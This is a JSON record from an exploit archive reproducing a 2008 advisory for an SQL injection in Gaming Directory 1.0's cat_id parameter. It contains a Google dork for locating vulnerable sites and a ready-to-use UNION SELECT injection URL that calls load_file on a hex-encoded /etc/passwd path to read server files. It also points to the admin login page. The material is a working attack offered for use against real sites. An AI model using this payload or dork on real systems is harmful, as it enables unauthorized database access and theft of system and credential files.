Gaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability

{"type": "zdt", "lastseen": "2016-04-19T23:50:30", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Gaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability", "published": "2008-04-05T00:00:00", "href": "http://0day.today/exploit/description/2821", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for unknown platform in category web applications", "hash": "1b7fa8d025ceb01d1fd9461851726d490655c922cb6f098c22e68a98e5741762", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "================================================================\r\nGaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability\r\n================================================================\r\n\r\n\r\n\r\n--==+================================================================================+==--\r\n--==+\t\t Gaming Directory 1.0 SQL Injection Vulnerbilitys\t +==--\r\n--==+================================================================================+==--\r\n\r\n\r\n\r\nDiscovered By: t0pP8uZz\r\nDiscovered On: 5 April 2008\r\nGoogle Dork: inurl:\"directory.php?ax=list\" gaming\r\n\r\n\r\nDESCRIPTION: \r\nthis popular gaming directory script is vulnerable due to insecure mysql querys.\r\nthis allows the remote attacker to pull info from the database.\r\n\r\nThe below Injection uses MYSQL's load_file function, since the admin area password is stored\r\nin a config file we can use load_file to to try and locate it and display the contents of the file. \r\ncertain permissons to the running db user is required for this to work. in the load_file below\r\nis a string that has been converted to HEX and if you can read hex then its /etc/passwd so this\r\nshould load the /etc/passwd file on most linux distros. Remember certain permissions are needed.\r\n\r\n\r\nEXPLOITS:\r\nhttp://site.com/directory.php?ax=list&sub=6&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(0x2F6574632F706173737764),4/**/FROM/**/links/*\r\n\r\n\r\nNOTE/TIP: \r\nadmin login is at /siteadmin/\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "id": "1337DAY-ID-2821", "sourceHref": "http://0day.today/exploit/2821", "modified": "2008-04-05T00:00:00", "reporter": "t0pP8uZz", "enchantments": {"vulnersScore": 6.4}}